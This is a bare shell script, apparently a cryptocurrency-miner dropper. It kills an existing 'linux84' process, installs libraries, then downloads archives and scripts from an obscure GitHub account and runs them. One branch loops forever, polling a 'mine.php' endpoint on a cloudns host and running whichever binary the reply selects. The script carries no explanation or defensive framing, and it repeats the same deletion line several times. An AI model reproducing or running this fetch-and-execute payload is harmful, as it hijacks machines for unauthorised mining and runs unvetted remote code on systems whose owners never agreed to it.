pkill -f linux84

apt-get update

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

mkdir /mnt/disks/

mkdir /mnt/disks/user/

mkdir /mnt/disks/user/project/

cd /mnt/disks/user/project/

apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

cd /mnt/disks/user/project/

if [[ 4 == 8 ]]; then

if [[ 4 == 4 ]]; then

cd /mnt/disks/user/project/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux4.tar.gz
tar -xf ./linux4.tar.gz

cd linux4

./linux84 8

else

cd /mnt/disks/user/project/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux8474744

bash ./linux8474744

fi

else

while true
do

cd /mnt/disks/user/project/

string=$(curl -s http://linux84.distro.cloudns.cl:84/mine.php?q=info)
if [[ $string == *"16384"* ]]; then

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux84.tar.gz
tar -xf ./linux84.tar.gz

cd linux84

./linux84 -t 6

else

cd /mnt/disks/user/project/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linuxapps84.tar.gz
tar -xf ./linuxapps84.tar.gz

cd linuxapps84

./linux84 -t 6

fi

done

fi
